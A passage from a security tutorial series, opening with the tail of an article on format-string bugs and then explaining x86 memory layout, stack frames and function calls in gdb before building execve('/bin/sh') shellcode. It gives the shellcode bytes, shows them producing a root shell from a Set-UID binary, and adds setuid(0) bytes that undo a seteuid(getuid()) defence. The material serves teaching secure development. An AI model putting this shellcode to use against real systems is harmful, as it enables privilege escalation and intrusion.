As shown in this article, the main trouble with this bug comes from the freedom left to a user to build his own format string. The solution to avoid such a flaw is very simple: never leave a user providing his own format string! Most of the time, this simply means to insert a string "%s"when function such as printf(), syslog(), …, are called. If you really can’t avoid it, then you have to check the input given by the user very carefully.


Acknowledgments

The authors thank Pascal Kalou Bouchareine for his patience (he had to find why our exploit with the shellcode in the stack did not work … whereas this same stack was not executable), his ideas (and more particularly the exec*() trick), his encouragements … but also for his article on format bugs which caused, in addition to our interest in the question, intense cerebral agitation ;-)

Links


Footnotes

… commands1
the word command means here everything that effects the format of the string: the width, the precision, …
… bytes2
the -1 comes from the last character reserved for the ”.

Avoiding security holes when developing an application – Part 2: memory, stack and functions, shellcode


Abstract:

This series of articles tries to put the emphasis on the main security holes that can appear within applications. It shows ways to avoid those holes by changing development habits a little.

This article, focuses on memory organization and layout and explains the relationship between a function and memory. The last section shows how to build shellcode.


Introduction

In our previous article we analyzed the simplest security holes, the ones based on external command execution. This article and the next one show a widespread type of attack, the buffer overflow. First we will study the memory structure of a running application, and then we’ll write a minimal piece of code allowing to start a shell (shellcode).

Memory layout

What is a program?

Let’s assume a program is an instruction set, expressed in machine code (regardless of the language used to write it) that we commonly call a binary. When first compiled to get the binary file, the program source held variables, constants and instructions. This section presents the memory layout of the different parts of the binary.

The different areas

To understand what goes on while executing a binary, let’s have a look at the memory organization. It relies on different areas :

memory layoutThis is generally not all, but we just focus on the parts that are most important for this article.

The command size -A file --radix 16 gives the size of each area reserved when compiling. From that you get their memory addresses (you can also use the command objdump to get this information). Here the output of size for a binary called “fct”:

>>size -A fct --radix 16
fct  :
section            size        addr
.interp            0x13   0x80480f4
.note.ABI-tag      0x20   0x8048108
.hash              0x30   0x8048128
.dynsym            0x70   0x8048158
.dynstr            0x7a   0x80481c8
.gnu.version        0xe   0x8048242
.gnu.version_r     0x20   0x8048250
.rel.got            0x8   0x8048270
.rel.plt           0x20   0x8048278
.init              0x2f   0x8048298
.plt               0x50   0x80482c8
.text             0x12c   0x8048320
.fini              0x1a   0x804844c
.rodata            0x14   0x8048468
.data               0xc   0x804947c
.eh_frame           0x4   0x8049488
.ctors              0x8   0x804948c
.dtors              0x8   0x8049494
.got               0x20   0x804949c
.dynamic           0xa0   0x80494bc
.bss               0x18   0x804955c
.stab             0x978         0x0
.stabstr         0x13f6         0x0
.comment          0x16e         0x0
.note              0x78   0x8049574
Total            0x23c8

The text area holds the program instructions. This area is read-only. It’s shared between every process running the same binary. Attempting to write into this area causes a segmentation violation error.

Before explaining the other areas, let’s recall a few things about variables in C. The global variables are used in the whole program while thelocal variables are only used within the function where they are declared. The static variables have a known size depending on their type when they are declared. Types can be char, int, double, pointers, etc. On a PC type machine, a pointer represents a 32bit integer address within memory. The size of the area pointed to is obviously unknown during compilation. A dynamic variable represents an explicitly allocated memory area – it is really a pointer pointing to that allocated address. global/local, static/dynamic variables can be combined without problems.

Let’s go back to the memory organization for a given process. The data area stores the initialized global static data (the value is provided at compile time), while the bss segment holds the uninitialized global data. These areas are reserved at compile time since their size is defined according to the objects they hold.

What about local and dynamic variables? They are grouped in a memory area reserved for program execution (user stack frame). Since functions can be invoked recursively, the number of instances of a local variable is not known in advance. When creating them, they will be put in the stack. This stack is on top of the highest addresses within the user address space, and works according to a LIFO model (Last In, First Out). The bottom of the user frame area is used for dynamic variables allocation. This area is called heap : it contains the memory areas addressed by pointers and the dynamic variables. When declared, a pointer is a 32bit variable either in BSS or in the stack and does not point to any valid address. When a process allocates memory (i.e. using malloc) the address of the first byte of that memory (also 32bit number) is put into the pointer.

Detailed example

The following example illustrates the variable layout in memory :

/* mem.c */

  int    index = 1;   //in data
  char * str;         //in bss
  int    nothing;     //in bss

void f(char c)
{
  int i;              //in the stack
  /* Reserves 5 characters in the heap */
  str = (char*) malloc (5 * sizeof (char));
  strncpy(str, "abcde", 5);
}

int main (void)
{
  f(0);
}

The gdb debugger confirms all this.

>>gdb mem
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public
License, and you are welcome to change it and/or distribute
copies of it under certain conditions.  Type "show copying"
to see the conditions.  There is absolutely no warranty
for GDB.  Type "show warranty" for details.  This GDB was
configured as "i386-redhat-linux"...
(gdb)

Let’s put a breakpoint in the f() function and run the program untill this point :

(gdb) list
7      void f(char c)
8      {
9         int i;
10        str = (char*) malloc (5 * sizeof (char));
11        strncpy (str, "abcde", 5);
12     }
13
14     int main (void)
(gdb) break 12
Breakpoint 1 at 0x804842a: file mem.c, line 12.
(gdb) run
Starting program: mem

Breakpoint 1, f (c=0 '00') at mem.c:12
12      }

We now can see the place of the different variables.

1. (gdb) print &index
$1 = (int *) 0x80494a4
2. (gdb) info symbol 0x80494a4
index in section .data
3. (gdb)  print &nothing
$2 = (int *) 0x8049598
4. (gdb) info symbol 0x8049598
nothing in section .bss
5. (gdb) print str
$3 = 0x80495a8 "abcde"
6. (gdb) info symbol 0x80495a8
No symbol matches 0x80495a8.
7. (gdb) print &str
$4 = (char **) 0x804959c
8. (gdb) info symbol 0x804959c
str in section .bss
9. (gdb) x 0x804959c
0x804959c <str>:     0x080495a8
10. (gdb) x/2x 0x080495a8
0x80495a8: 0x64636261      0x00000065

The command in 1 (print &index) shows the memory address for the index global variable. The second instruction (info) gives the symbol associated to this address and the place in memory where it can be found : index, an initialized global static variable is stored in the data area.

Instructions 3 and 4 confirm that the uninitialized static variable nothing can be found in the BSS segment.

Line 5 displays str … in fact the str variable content, that is the address 0x80495a8. The instruction 6 shows that no variable has been defined at this address. Command 7 allows you to get the str variable address and command 8 indicates it can be found in the BSS segment.

At 9, the 4 bytes displayed correspond to the memory content at address 0x804959c : it’s a reserved address within the heap. The content at 10 shows our string “abcde” :

hexadecimal value : 0x64 63 62 61      0x00000065
character         :    d  c  b  a               e

The local variables c and i are put in the stack.

We notice that the size returned by the size command for the different areas does not match what we expected when looking at our program. The reason is that various other variables declared in libraries appear when running the program (type info variables under gdb to get them all).

The stack and the heap

Each time a function is called, a new environment must be created within memory for local variables and the function’s parameters (hereenvironment means all elements appearing while executing a function : its arguments, its local variables, its return address in the execution stack… this is not the environment for shell variables we mentioned in the previous article). The %esp (extended stack pointer) register holds the top stack address, which is at the bottom in our representation, but we’ll keep calling it top to complete analogy to a stack of real objects, and points to the last element added to the stack; dependent on the architecture, this register may sometimes point to the first free space in the stack.

The address of a local variable within the stack could be expressed as an offset relative to %esp. However, items are always added or removed to/from the stack, the offset of each variable would then need readjustment and that is very ineffecient. The use of a second register allows to improve that : %ebp (extended base pointer) holds the start address of the environment of the current function. Thus, it’s enough to express the offset related to this register. It stays constant while the function is executed. Now it is easy to find the parameters or the local variables within a function.

The stack’s basic unit is the word : on i386 CPUs it’s 32bit, that is 4 bytes. This is different for other architectures. On Alpha CPUs a word is 64 bits. The stack only manages words, that means every allocated variable uses the same word size. We’ll see that with more details in the description of a function prolog. The display of the str variable content using gdb in the previous example illustrates it. The gdb x command displays a whole 32bit word (read it from left to right since it’s a little endian representation).

The stack is usually manipulated with just 2 cpu instructions :

  • push value : this instruction puts the value at the top of the stack. It reduces %esp by a word to get the address of the next word available in the stack, and stores the value given as an argument in that word;
  • pop dest : puts the item from the top of the stack into the ‘dest’. It puts the value held at the address pointed to by %esp in dest and increases the %esp register. To be precise nothing is removed from the stack. Just the pointer to the top of the stack changes.

The registers

What exactly are the registers? You can see them as drawers holding only one word, while memory is made of a series of words. Each time a new value is put in a register, the old value is lost. Registers allow direct communication between memory and CPU.

The first ‘e‘ appearing in the registers name means “extended” and indicates the evolution between old 16bit and present 32bit architectures.

The registers can be divided into 4 categories :

  1. general registers : %eax, %ebx, %ecx and %edx are used to manipulate data;
  2. segment registers : 16bit %cs, %ds, %esx and %ss, hold the first part of a memory address;
  3. offset registers : they indicate an offset related to segment registers :
    • %eip (Extended Instruction Pointer) : indicates the address of the next instruction to be executed;
    • %ebp (Extended Base Pointer) : indicates the beginning of the local environment for a function;
    • %esi (Extended Source Index) : holds the data source offset in an operation using a memory block;
    • %edi (Extended Destination Index) : holds the destination data offset in an operation using a memory block;
    • %esp (Extended Stack Pointer) : the top of the stack;
  4. special registers : they are only used by the CPU.

Note: everything said here about registers is very x86 oriented but alpha, sparc, etc have registers with different names but similar functionality.

The functions

Introduction

This section presents the behavior of a program from call to finish. Along this section we’ll use the following example :

/* fct.c */

void toto(int i, int j)
{
  char str[5] = "abcde";
  int k = 3;
  j = 0;
  return;
}

int main(int argc, char **argv)
{
  int i = 1;
  toto(1, 2);
  i = 0;
  printf("i=%d\n",i);
}

The purpose of this section is to explain the behavior of the above functions regarding the stack and the registers. Some attacks try to change the way a program runs. To understand them, it’s useful to know what normally happens.

Running a function is divided into three steps :

  1. the prolog : when entering a function, you already prepare the way out of it, saving the stack’s state before entering the function and reserving the needed memory to run it;
  2. the function call : when a function is called, its parameters are put into the stack and the instruction pointer (IP) is saved to allow the instruction execution to continue from the right place after the function;
  3. the function return : to put things back as they were before calling the function.

The prolog

A function always starts with the instructions :

push   %ebp
mov    %esp,%ebp
push   $0xc,%esp       //$0xc depends on each program

These three instructions make what is called the prolog. The diagram 1 details the way the toto() function prolog works explaining the %ebpand %esp registers parts :

Diag. 1 : prolog of a function
prolog Initially, %ebp points in the memory to any X address. %esp is lower in the stack, at Y address and points to the last stack entry. When entering a function, you must save the beginning of the “current environment”, that is %ebp. Since %ebp is put into the stack, %esp decreases by a memory word.
environment This second instruction allows building a new “environment” for the function, putting %ebp on the top of the stack. %ebp and%esp then pointing to the same memory word which holds the previous environment address.
stack space for local variables Now the stack space for local variables has to be reserved. The character array is defined with 5 items and needs 5 bytes (a char is one byte). However the stack only manages words, and can only reserve multiples of a word (1 word, 2 words, 3words, …). To store 5 bytes in the case of a 4 bytes word, you must use 8 bytes (that is 2 words). The grayed part could be used, even if it is not really part of the string. The k integer uses 4 bytes. This space is reserved by decreasing the value of %esp by 0xc (12 in hexadecimal). The local variables use 8+4=12 bytes (i.e. 3 words).

Apart from the mechanism itself, the important thing to remember here is the local variables position : the local variables have a negativeoffset when related to %ebp. The i=0 instruction in the main() function illustrates this. The assembly code (cf. below) uses indirect addressing to access the i variable :

0x8048411 <main+25>:    movl   $0x0,0xfffffffc(%ebp)

The 0xfffffffc hexadecimal represents the -4 integer. The notation means put the value 0 into the variable found at “-4 bytes” relatively to the%ebp register. i is the first and only local variable in the main() function, therefore its address is 4 bytes (i.e. integer size) “below” the %ebpregister.

The call

Just like the prolog of a function prepares its environment, the function call allows this function to receive its arguments, and once terminated, to return to the calling function.

As an example, let’s take the toto(1, 2); call.

Diag. 2 : Function call
argument on stack Before calling a function, the arguments it needs are stored in the stack. In our example, the two constant integers 1 and 2 are first stacked, beginning with the last one. The %eip register holds the address of the next instruction to execute, in this case the function call.
call When executing the call instruction, %eip takes the address value of the following instruction found 5 bytes after (call is a 5 byte instruction – every instruction doesn’t use the same space depending on the CPU). The call then saves the address contained in %eip to be able to go back to the execution after running the function. This “backup” is done from an implicit instruction putting the register in the stack :

    push %eip

The value given as an argument to call corresponds to the address of the first prolog instruction from the toto() function. This address is then copied to %eip, thus it becomes the next instruction to execute.

Once we are in the function body, its arguments and the return address have a positive offset when related to %ebp, since the next instruction puts this register to the top of the stack. The j=0 instruction in the toto() function illustrates this. The Assembly code again uses indirect addressing to access the j :

0x80483ed <toto+29>:    movl   $0x0,0xc(%ebp)

The 0xc hexadecimal represents the +12 integer. The notation used means put the value 0 in the variable found at “+12 bytes” relatively to the%ebp register. j is the function’s second argument and it’s found at 12 bytes “on top” of the %ebp register (4 for instruction pointer backup, 4 for the first argument and 4 for the second argument – cf. the first diagram in the return section)

The return

Leaving a function is done in two steps. First, the environment created for the function must be cleaned up (i.e. putting %ebp and %eip back as they were before the call). Once this done, we must check the stack to get the information related to the function we are just coming out off.

The first step is done within the function with the instructions :

leave
ret

The next one is done within the function where the call took place and consists of cleaning up the stack from the arguments of the called function.

We carry on with the previous example of the toto() function.

Diag. 3 : Function return
initial situation Here we describe the initial situation before the call and the prolog. Before the call, %ebp was at address X and %esp at address Y . >From there we stacked the function arguments, saved %eip and %ebp and reserved some space for our local variables. The next executed instruction will be leave.
leave The instruction leave is equivalent to the sequence :

    mov ebp esp
    pop ebp

The first one takes %esp and %ebp back to the same place in the stack. The second one puts the top of the stack in the %ebpregister. In only one instruction (leave), the stack is like it would have been without the prolog.

restore The ret instruction restores %eip in such a way the calling function execution starts back where it should, that is after the function we are leaving. For this, it’s enough to unstack the top of the stack in %eip.We are not yet back to the initial situation since the function arguments are still stacked. Removing them will be the next instruction, represented with its Z+5 address in %eip (notice the instruction addressing is increasing as opposed to what’s happening on the stack).
stacking of parameters The stacking of parameters is done in the calling function, so is it for unstacking. This is illustrated in the opposite diagram with the separator between the instructions in the called function and the add 0x8, %esp in the calling function. This instruction takes %esp back to the top of the stack, as many bytes as the toto() function parameters used. The %ebp and%esp registers are now in the situation they were before the call. On the other hand, the %eip instruction register moved up.

Disassembling

gdb allows to get the Assembly code corresponding to the main() and toto() functions :

>>gcc -g -o fct fct.c
>>gdb fct
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.  GDB is free
software, covered by the GNU General Public License, and
you are welcome to change it and/or distribute copies of
it under certain conditions.  Type "show copying" to see
the conditions.  There is absolutely no warranty for GDB.
Type "show warranty" for details.  This GDB was configured
as "i386-redhat-linux"...
(gdb) disassemble main                    //main
Dump of assembler code for function main:

0x80483f8 <main>:    push   %ebp //prolog
0x80483f9 <main+1>:  mov    %esp,%ebp
0x80483fb <main+3>:  sub    $0x4,%esp

0x80483fe <main+6>:  movl   $0x1,0xfffffffc(%ebp)

0x8048405 <main+13>: push   $0x2 //call
0x8048407 <main+15>: push   $0x1
0x8048409 <main+17>: call   0x80483d0 <toto>


0x804840e <main+22>: add    $0x8,%esp //return from toto()

0x8048411 <main+25>: movl   $0x0,0xfffffffc(%ebp)
0x8048418 <main+32>: mov    0xfffffffc(%ebp),%eax

0x804841b <main+35>: push   %eax     //call
0x804841c <main+36>: push   $0x8048486
0x8048421 <main+41>: call   0x8048308 <printf>


0x8048426 <main+46>: add    $0x8,%esp //return from printf()
0x8048429 <main+49>: leave            //return from main()
0x804842a <main+50>: ret

End of assembler dump.
(gdb) disassemble toto                    //toto
Dump of assembler code for function toto:

0x80483d0 <toto>:     push   %ebp   //prolog
0x80483d1 <toto+1>:   mov    %esp,%ebp
0x80483d3 <toto+3>:   sub    $0xc,%esp

0x80483d6 <toto+6>:   mov    0x8048480,%eax
0x80483db <toto+11>:  mov    %eax,0xfffffff8(%ebp)
0x80483de <toto+14>:  mov    0x8048484,%al
0x80483e3 <toto+19>:  mov    %al,0xfffffffc(%ebp)
0x80483e6 <toto+22>:  movl   $0x3,0xfffffff4(%ebp)
0x80483ed <toto+29>:  movl   $0x0,0xc(%ebp)
0x80483f4 <toto+36>:  jmp    0x80483f6 <toto+38>

0x80483f6 <toto+38>:  leave         //return from toto()
0x80483f7 <toto+39>:  ret

End of assembler dump.

The instructions without color correspond to our program instructions, such as assignment for instance.

Creating a shellcode

In some cases, it’s possible to act on the process stack content, by overwriting the return address of a function and making the application execute some arbitrary code. This is especially interesting for a cracker if the application runs under an ID different from the user’s one (Set-UID program or daemon). This type of mistake is particularly dangerous if an application like a document reader is started by another user. The famous Acrobat Reader bug, where a modified document was able to start a buffer overflow. It also works for network services (ie : imap).

In future articles, we’ll talk about mechanisms used to execute instructions. Here we start studying the code itself, the one we want to be executed from the main application. The simplest solution is to have a piece of code to run a shell. The reader can then perform other actions such as changing the /etc/passwd file permission. For reasons which will be obvious later, this program must be done in Assembly language. This type of small program which is used to run a shell is usually called shellcode.

The examples mentioned are inspired from Aleph One’s article “Smashing the Stack for Fun and Profit” from the Phrack magazine number 49.

With C language

The goal of a shellcode is to run a shell. The following C program does this :

/* shellcode1.c */

    #include <stdio.h>
    #include <unistd.h>

int main()
{
  char * name[] = {"/bin/sh", NULL};
  execve(name[0], name, NULL);
  return (0);
}

Among the set of functions able to call a shell, many reasons recommend the use of execve(). First, it’s a true system-call, unlike the other functions from the exec() family, which are in fact GlibC library functions built from execve(). A system-call is done from an interrupt. It suffices to define the registers and their content to get an effective and short Assembly code.

Moreover, if execve() succeeds, the calling program (here the main application) is replaced with the executable code of the new program and starts. When the execve() call fails, the program execution goes on. In our example, the code is inserted in the middle of the attacked application. Going on with execution would be meaningless and could even be disastrous. The execution then must end as quickly as possible. A return (0) allows exiting a program only when this instruction is called from the main() function, this is is unlikely here. We then must force termination through the exit() function.

/* shellcode2.c */

    #include <stdio.h>
    #include <unistd.h>

int main()
{
  char * name [] = {"/bin/sh", NULL};
  execve (name [0], name, NULL);
  exit (0);
}

In fact, exit() is another library function that wraps the real system-call _exit(). A new change brings us closer to the system :

/* shellcode3.c */
    #include <unistd.h>
    #include <stdio.h>

int main()
{
  char * name [] = {"/bin/sh", NULL};
  execve (name [0], name, NULL);
  _exit(0);
}

Now, it’s time to compare our program to its Assembly equivalent.

Assembly calls

We’ll use gcc and gdb to get the Assembly instructions corresponding to our small program. Let’s compile shellcode3.c with the debugging option (-g) and integrate the functions normally found in shared libraries into the program itself with the --static option. Now, we have the needed information to understand the way _exexve() and _exit() system-calls work.

$ gcc -o shellcode3 shellcode3.c -O2 -g --static

Next, with gdb, we look for our functions Assembly equivalent. This is for Linux on Intel platform (i386 and up).

$ gdb shellcode3
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public
License, and you are welcome to change it and/or distribute
copies of it under certain conditions.  Type "show copying"
to see the conditions.  There is absolutely no warranty
for GDB.  Type "show warranty" for details.  This GDB was
configured as "i386-redhat-linux"...

We ask gdb to list the Assembly code, more particularly its main() function.

(gdb) disassemble main
Dump of assembler code for function main:
0x8048168 <main>:       push   %ebp
0x8048169 <main+1>:     mov    %esp,%ebp
0x804816b <main+3>:     sub    $0x8,%esp
0x804816e <main+6>:     movl   $0x0,0xfffffff8(%ebp)
0x8048175 <main+13>:    movl   $0x0,0xfffffffc(%ebp)
0x804817c <main+20>:    mov    $0x8071ea8,%edx
0x8048181 <main+25>:    mov    %edx,0xfffffff8(%ebp)
0x8048184 <main+28>:    push   $0x0
0x8048186 <main+30>:    lea    0xfffffff8(%ebp),%eax
0x8048189 <main+33>:    push   %eax
0x804818a <main+34>:    push   %edx
0x804818b <main+35>:    call   0x804d9ac <__execve>
0x8048190 <main+40>:    push   $0x0
0x8048192 <main+42>:    call   0x804d990 <_exit>
0x8048197 <main+47>:    nop
End of assembler dump.
(gdb)

The calls to functions at addresses 0x804818b and 0x8048192 invoke the C library subroutines holding the real system-calls. Notice the0x804817c : mov $0x8071ea8,%edx instruction fills the %edx register with a value looking like an address. Let’s examine the memory content from this address, displaying it as a string :

(gdb) printf "%s\n", 0x8071ea8
/bin/sh
(gdb)

Now we know where the string is. Let’s have a look at the execve() and _exit() functions disassembling list :

(gdb) disassemble __execve
Dump of assembler code for function __execve:
0x804d9ac <__execve>:    push   %ebp
0x804d9ad <__execve+1>:  mov    %esp,%ebp
0x804d9af <__execve+3>:  push   %edi
0x804d9b0 <__execve+4>:  push   %ebx
0x804d9b1 <__execve+5>:  mov    0x8(%ebp),%edi
0x804d9b4 <__execve+8>:  mov    $0x0,%eax
0x804d9b9 <__execve+13>: test   %eax,%eax
0x804d9bb <__execve+15>: je     0x804d9c2 <__execve+22>
0x804d9bd <__execve+17>: call   0x0
0x804d9c2 <__execve+22>: mov    0xc(%ebp),%ecx
0x804d9c5 <__execve+25>: mov    0x10(%ebp),%edx
0x804d9c8 <__execve+28>: push   %ebx
0x804d9c9 <__execve+29>: mov    %edi,%ebx
0x804d9cb <__execve+31>: mov    $0xb,%eax
0x804d9d0 <__execve+36>: int    $0x80
0x804d9d2 <__execve+38>: pop    %ebx
0x804d9d3 <__execve+39>: mov    %eax,%ebx
0x804d9d5 <__execve+41>: cmp    $0xfffff000,%ebx
0x804d9db <__execve+47>: jbe    0x804d9eb <__execve+63>
0x804d9dd <__execve+49>: call   0x8048c84 <__errno_location>
0x804d9e2 <__execve+54>: neg    %ebx
0x804d9e4 <__execve+56>: mov    %ebx,(%eax)
0x804d9e6 <__execve+58>: mov    $0xffffffff,%ebx
0x804d9eb <__execve+63>: mov    %ebx,%eax
0x804d9ed <__execve+65>: lea    0xfffffff8(%ebp),%esp
0x804d9f0 <__execve+68>: pop    %ebx
0x804d9f1 <__execve+69>: pop    %edi
0x804d9f2 <__execve+70>: leave
0x804d9f3 <__execve+71>: ret
End of assembler dump.
(gdb) disassemble _exit
Dump of assembler code for function _exit:
0x804d990 <_exit>:      mov    %ebx,%edx
0x804d992 <_exit+2>:    mov    0x4(%esp,1),%ebx
0x804d996 <_exit+6>:    mov    $0x1,%eax
0x804d99b <_exit+11>:   int    $0x80
0x804d99d <_exit+13>:   mov    %edx,%ebx
0x804d99f <_exit+15>:   cmp    $0xfffff001,%eax
0x804d9a4 <_exit+20>:   jae    0x804dd90 <__syscall_error>
End of assembler dump.
(gdb) quit

The real kernel call is done through the 0x80 interrupt, at address 0x804d9d0 for execve() and at 0x804d99b for _exit(). This entry point is common to various system-calls, so the distinction is made with the %eax register content. Concerning execve(), it has the 0x0B value, while _exit() has the0x01.

Diag. 4 : parameters of the execve() function
parameters of the execve() function

The analysis of these function’s Assembly instructions provides us with the parameters they use :

  • execve() needs various parameters (cf. diag 4) :
    • the %ebx register holds the string address representing the command to execute, “/bin/sh” in our example (0x804d9b1 : mov 0x8(%ebp),%edi followed by 0x804d9c9 : mov %edi,%ebx) ;
    • the %ecx register holds the address of the argument array (0x804d9c2 : mov 0xc(%ebp),%ecx). The first argument must be the program name and we need nothing else : an array holding the string address “/bin/sh” and a NULL pointer will be enough;
    • the %edx register holds the array address representing the program to launch the environment (0x804d9c5 : mov 0x10(%ebp),%edx). To keep our program simple, we’ll use an empty environment : that is a NULL pointer will do the trick.
  • the _exit() function ends the process, and returns an execution code to its father (usually a shell), held in the %ebx register ;

We then need the “/bin/sh” string, a pointer to this string and a NULL pointer (for the arguments since we have none and for the environment since we don’t define any). We can see a possible data representation before the execve() call. Building an array with a pointer to the /bin/shstring followed by a NULL pointer, %ebx will point to the string, %ecx to the whole array, and %edx to the second item of the array (NULL). This is shown in diag. 5.

Diag. 5 : data representation relative to registers
data

Locating the shellcode within memory

The shellcode is usually inserted into a vulnerable program through a command line argument, an environment variable or a typed string. Anyway, when creating the shellcode, we don’t know the address it will use. Nevertheless, we must know the “/bin/sh” string address. A small trick allows us to get it.

When calling a subroutine with the call instruction, the CPU stores the return address in the stack, that is the address immediately following this call instruction (see above). Usually, the next step is to store the stack state (especially the %ebp register with the push %ebp instruction). To get the return address when entering the subroutine, it’s enough to unstack with the pop instruction. Of course, we then store our “/bin/sh” string immediately after the call instruction to allow our “home made prolog” to provide us with the required string address. That is :

 beginning_of_shellcode:
    jmp subroutine_call

 subroutine:
    popl %esi
    ...
    (Shellcode itself)
    ...
 subroutine_call:
    call subroutine
    /bin/sh

Of course, the subroutine is not a real one: either the execve() call succeeds, and the process is replaced with a shell, or it fails and the _exit()function ends the program. The %esi register gives us the “/bin/sh” string address. Then, it’s enough to build the array putting it just after the string : its first item (at %esi+8, /bin/sh length + a null byte) holds the value of the %esi register, and its second at %esi+12 a null address (32 bit). The code will look like :

    popl %esi
    movl %esi, 0x8(%esi)
    movl $0x00, 0xc(%esi)

The diagram 6 shows the data area :

Diag. 6 : data array
data area

The null bytes problem

Vulnerable functions are often string manipulation routines such as strcpy(). To insert the code into the middle of the target application, the shellcode has to be copied as a string. However, these copy routines stop as soon as they find a null character. Then, our code must not have any. Using a few tricks will prevent us from writing null bytes. For example, the instruction

    movl $0x00, 0x0c(%esi)

will be replaced with

    xorl %eax, %eax
    movl %eax, %0x0c(%esi)

This example shows the use of a null byte. However, the translation of some instructions to hexadecimal can reveal some. For example, to make the distinction between the _exit(0) system-call and others, the %eax register value is 1, as seen in the
0x804d996 <_exit+6>: mov $0x1,%eax
Converted to hexadecimal, this string becomes :

 b8 01 00 00 00          mov    $0x1,%eax

You must then avoid its use. In fact, the trick is to initialize %eax with a register value of 0 and increment it.

On the other hand, the “/bin/sh” string must end with a null byte. We can write one while creating the shellcode, but, depending on the mechanism used to insert it into a program, this null byte may not be present in the final application. It’s better to add one this way :

    /* movb only works on one byte */
    /* this instruction is equivalent to */
    /* movb %al, 0x07(%esi) */
    movb %eax, 0x07(%esi)

Building the shellcode

We now have everything to create our shellcode :

/* shellcode4.c */

int main()
{
  asm("jmp subroutine_call

subroutine:
    /* Getting /bin/sh address*/
        popl %esi
    /* Writing it as first item in the array */
        movl %esi,0x8(%esi)
    /* Writing NULL as second item in the array */
        xorl %eax,%eax
        movl %eax,0xc(%esi)
    /* Putting the null byte at the end of the string */
        movb %eax,0x7(%esi)
    /* execve() function */
        movb $0xb,%al
    /* String to execute in %ebx */
        movl %esi, %ebx
    /* Array arguments in %ecx */
        leal 0x8(%esi),%ecx
    /* Array environment in %edx */
        leal 0xc(%esi),%edx
    /* System-call */
        int  $0x80

    /* Null return code */
        xorl %ebx,%ebx
    /*  _exit() function : %eax = 1 */
        movl %ebx,%eax
        inc  %eax
    /* System-call */
        int  $0x80

subroutine_call:
        subroutine_call
        .string \"/bin/sh\"
      ");
}

The code is compiled with “gcc -o shellcode4 shellcode4.c“. The command “objdump --disassemble shellcode4” ensures that our binary doesn’t hold anymore null bytes :

08048398 <main>:
 8048398:   55                      pushl  %ebp
 8048399:   89 e5                   movl   %esp,%ebp
 804839b:   eb 1f                   jmp    80483bc <subroutine_call>

0804839d <subroutine>:
 804839d:   5e                      popl   %esi
 804839e:   89 76 08                movl   %esi,0x8(%esi)
 80483a1:   31 c0                   xorl   %eax,%eax
 80483a3:   89 46 0c                movb   %eax,0xc(%esi)
 80483a6:   88 46 07                movb   %al,0x7(%esi)
 80483a9:   b0 0b                   movb   $0xb,%al
 80483ab:   89 f3                   movl   %esi,%ebx
 80483ad:   8d 4e 08                leal   0x8(%esi),%ecx
 80483b0:   8d 56 0c                leal   0xc(%esi),%edx
 80483b3:   cd 80                   int    $0x80
 80483b5:   31 db                   xorl   %ebx,%ebx
 80483b7:   89 d8                   movl   %ebx,%eax
 80483b9:   40                      incl   %eax
 80483ba:   cd 80                   int    $0x80

080483bc <subroutine_call>:
 80483bc:   e8 dc ff ff ff          call   804839d <subroutine>
 80483c1:   2f                      das
 80483c2:   62 69 6e                boundl 0x6e(%ecx),%ebp
 80483c5:   2f                      das
 80483c6:   73 68                   jae    8048430 <_IO_stdin_used+0x14>
 80483c8:   00 c9                   addb   %cl,%cl
 80483ca:   c3                      ret
 80483cb:   90                      nop
 80483cc:   90                      nop
 80483cd:   90                      nop
 80483ce:   90                      nop
 80483cf:   90                      nop

The data found after the 80483c1 address doesn’t represent instructions, but the “/bin/sh” string characters (in hexadécimal, the sequence 2f 62 69 6e 2f 73 68 00) and random bytes. The code doesn’t hold any zeros, except the null character at the end of the string at 80483c8.

Now, let’s test our program :

$ ./shellcode4
Segmentation fault (core dumped)
$

Ooops! Not very conclusive. If we think a bit, we can see the memory area where the main() function is found (i.e. the text area mentioned at the beginning of this article) is read-only. The shellcode can not modify it. What can we do now, to test our shellcode?

To get round the read-only problem, the shellcode must be put in a data area. Let’s put it in an array declared as a global variable. We must use another trick to be able to execute the shellcode. Let’s replace the main() function return address found in the stack with the address of the array holding the shellcode. Don’t forget that the main function is a “standard” routine, called by pieces of code that the linker added. The return address is overwritten when writing the array of characters two places below the stacks first position.

  /* shellcode5.c */

  char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

  int main()
  {
      int * ret;

      /* +2 will behave as a 2 words offset */
      /* (i.e. 8 bytes) to the top of the stack : */
      /*   - the first one for the reserved word for the
             local variable */
      /*   - the second one for the saved %ebp register */

      * ((int *) & ret + 2) = (int) shellcode;
      return (0);
  }

Now, we can test our shellcode :

$ cc shellcode5.c -o shellcode5
$ ./shellcode5
bash$ exit
$

We can even install the shellcode5 program Set-UID root, and check the shell launched with the data handled by this program is executed under the root  identity :

$ su
Password:
# chown root.root shellcode5
# chmod +s shellcode5
# exit
$ ./shellcode5
bash# whoami
root
bash# exit
$

Generalization and last details

This shellcode is somewhat limited (well, it’s not too bad with so few bytes!). For instance, if our test program becomes :

  /* shellcode5bis.c */

 char shellcode[] =
 "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
 "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
 "\x80\xe8\xdc\xff\xff\xff/bin/sh";

  int main()
  {
      int * ret;
      seteuid(getuid());
      * ((int *) & ret + 2) = (int) shellcode;
      return (0);
  }

we fix the process effective UID to its real UID value, as we suggested it in the previous article. This time, the shell is run without specific privileges :

$ su
Password:
# chown root.root shellcode5bis
# chmod +s shellcode5bis
# exit
$ ./shellcode5bis
bash# whoami
pappy
bash# exit
$

However, the seteuid(getuid()) instructions are not a very effective protection. One need only insert the setuid(0); call equivalent at the beginning of a shellcode to get the rights linked to the initial EUID for an S-UID application.

This instruction code is :

  char setuid[] =
         "\x31\xc0"       /* xorl %eax, %eax */
         "\x31\xdb"       /* xorl %ebx, %ebx */
         "\xb0\x17"       /* movb $0x17, %al */
         "\xcd\x80";

Integrating it into our previous shellcode, our example becomes :

  /* shellcode6.c */

  char shellcode[] =
